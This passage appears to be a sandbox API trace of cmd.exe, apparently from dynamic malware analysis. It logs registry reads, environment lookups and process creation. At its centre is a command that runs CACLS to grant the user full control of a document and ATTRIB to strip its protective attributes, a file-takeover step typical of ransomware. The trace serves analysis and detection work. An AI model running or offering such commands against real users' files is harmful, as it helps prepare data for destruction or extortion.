RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.640] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fca4, dwLength=0x1c | out: lpBuffer=0x18fca4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.640] GetConsoleOutputCP () returned 0x1b5 [0234.640] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.640] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.640] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.640] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.641] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.641] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.641] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.641] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.641] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.641] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.641] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.641] GetEnvironmentStringsW () returned 0x250220* [0234.641] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0234.642] GetEnvironmentStringsW () returned 0x250220* [0234.642] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0234.642] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec44 | out: phkResult=0x18ec44*=0x40) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0xb0, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x0, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegCloseKey (hKey=0x40) returned 0x0 [0234.642] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec44 | out: phkResult=0x18ec44*=0x40) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x40, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec4c, 
lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x1, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x0, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x9, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x4, lpData=0x18ec50*=0x9, lpcbData=0x18ec48*=0x4) returned 0x0 [0234.642] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec4c, lpData=0x18ec50, lpcbData=0x18ec48*=0x1000 | out: lpType=0x18ec4c*=0x0, lpData=0x18ec50*=0x9, lpcbData=0x18ec48*=0x1000) returned 0x2 [0234.642] RegCloseKey (hKey=0x40) returned 0x0 [0234.642] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.642] srand (_Seed=0x5b8863c2) [0234.642] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" [0234.642] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" [0234.643] GetCurrentDirectoryW 
(in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.643] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x251980, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.643] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.643] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.643] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.643] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.643] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.643] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.643] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.643] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.643] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.643] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.643] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.643] GetEnvironmentStringsW () returned 0x252370* [0234.643] FreeEnvironmentStringsW (penv=0x252370) returned 1 [0234.643] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.643] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.643] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.644] _wcsicmp 
(_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.644] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.644] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.644] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.644] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.644] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.644] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.644] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.644] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa10, lpFilePart=0x18fa0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa0c*="Desktop") returned 0x18 [0234.644] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.644] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f78c | out: lpFindFileData=0x18f78c) returned 0x250a00 [0234.644] FindClose (in: hFindFile=0x250a00 | out: hFindFile=0x250a00) returned 1 [0234.644] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f78c | out: lpFindFileData=0x18f78c) returned 0x250a00 [0234.644] FindClose (in: hFindFile=0x250a00 | out: hFindFile=0x250a00) returned 1 [0234.644] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f78c | out: lpFindFileData=0x18f78c) returned 0x250a00 [0234.644] FindClose (in: hFindFile=0x250a00 | out: hFindFile=0x250a00) returned 1 [0234.644] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.645] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.645] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") 
returned 1 [0234.645] GetEnvironmentStringsW () returned 0x250220* [0234.645] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0234.645] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.645] GetConsoleOutputCP () returned 0x1b5 [0234.645] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.645] GetUserDefaultLCID () returned 0x409 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb50, cchData=128 | out: lpLCData="0") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb50, cchData=128 | out: lpLCData="0") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb50, cchData=128 | out: lpLCData="1") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, 
lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.646] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.647] GetConsoleTitleW (in: lpConsoleTitle=0x240938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.647] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.647] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.647] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.647] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.648] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0234.648] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0234.648] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0234.648] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0234.648] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0234.648] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0234.648] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0234.648] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0234.651] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0234.651] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0234.651] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0234.651] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0234.651] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0234.651] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0234.651] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0234.652] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0234.652] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0234.652] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0234.652] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0234.652] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0234.653] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0234.653] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0234.653] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0234.653] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0234.653] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0234.653] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0234.653] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0234.653] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0234.653] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 
[0234.653] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0234.653] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0234.653] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0234.653] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0234.653] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0234.653] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0234.653] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0234.653] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0234.653] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0234.653] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0234.653] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0234.653] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0234.653] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0234.653] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0234.653] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0234.653] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0234.654] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0234.654] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 
[0234.654] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0234.654] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0234.654] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0234.654] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0234.654] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0234.654] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0234.654] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0234.654] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0234.654] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0234.654] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0234.654] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0234.654] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0234.654] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0234.654] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0234.654] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0234.654] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0234.654] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0234.654] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0234.654] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0234.654] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0234.654] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0234.654] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0234.654] _wcsicmp (_String1="CACLS", _String2="REM") returned 
-15 [0234.654] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0234.655] SetErrorMode (uMode=0x0) returned 0x0 [0234.655] SetErrorMode (uMode=0x1) returned 0x0 [0234.655] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x251db0, lpFilePart=0x18f304 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f304*="Desktop") returned 0x18 [0234.655] SetErrorMode (uMode=0x0) returned 0x1 [0234.655] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.655] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0234.660] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.661] FindClose (in: hFindFile=0x251f88 | out: hFindFile=0x251f88) returned 1 [0234.661] FindClose (in: hFindFile=0x251f88 | out: hFindFile=0x251f88) returned 1 [0234.661] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0234.661] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0234.661] GetConsoleTitleW (in: lpConsoleTitle=0x18f578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.217] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f400, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f4c8 | out: lpAttributeList=0x18f400, lpSize=0x18f4c8) returned 1 [0235.218] UpdateProcThreadAttribute (in: lpAttributeList=0x18f400, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f400, lpPreviousValue=0x0) returned 1 [0235.218] GetStartupInfoW (in: lpStartupInfo=0x18f3bc | out: lpStartupInfo=0x18f3bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, 
dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0235.218] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0235.219] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f45c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f4a8 | out: lpCommandLine="CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x18f4a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf68, dwThreadId=0xd40)) returned 1 [0235.221] CloseHandle (hObject=0x4c) returned 1 [0235.221] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0235.221] GetEnvironmentStringsW () returned 0x250220* [0235.221] FreeEnvironmentStringsW (penv=0x250220) returned 1 [0235.221] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0235.518] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18f39c | out: lpExitCode=0x18f39c*=0x0) returned 1 [0235.518] CloseHandle (hObject=0x50) returned 1 [0235.518] _vsnwprintf (in: _Buffer=0x18f4e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3a8 | out: _Buffer="00000000") returned 8 [0235.518] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0235.518] 
GetEnvironmentStringsW () returned 0x252340* [0235.518] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.518] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0235.518] GetEnvironmentStringsW () returned 0x252340* [0235.518] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.518] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f400 | out: lpAttributeList=0x18f400) [0235.518] GetConsoleTitleW (in: lpConsoleTitle=0x18f7e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.518] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.519] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0235.519] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.519] FindClose (in: hFindFile=0x24e400 | out: hFindFile=0x24e400) returned 1 [0235.519] FindClose (in: hFindFile=0x24e400 | out: hFindFile=0x24e400) returned 1 [0235.519] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0235.519] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0235.519] GetConsoleTitleW (in: lpConsoleTitle=0x18f578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.519] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f400, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f4c8 | out: lpAttributeList=0x18f400, lpSize=0x18f4c8) returned 1 [0235.519] UpdateProcThreadAttribute (in: lpAttributeList=0x18f400, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f400, lpPreviousValue=0x0) returned 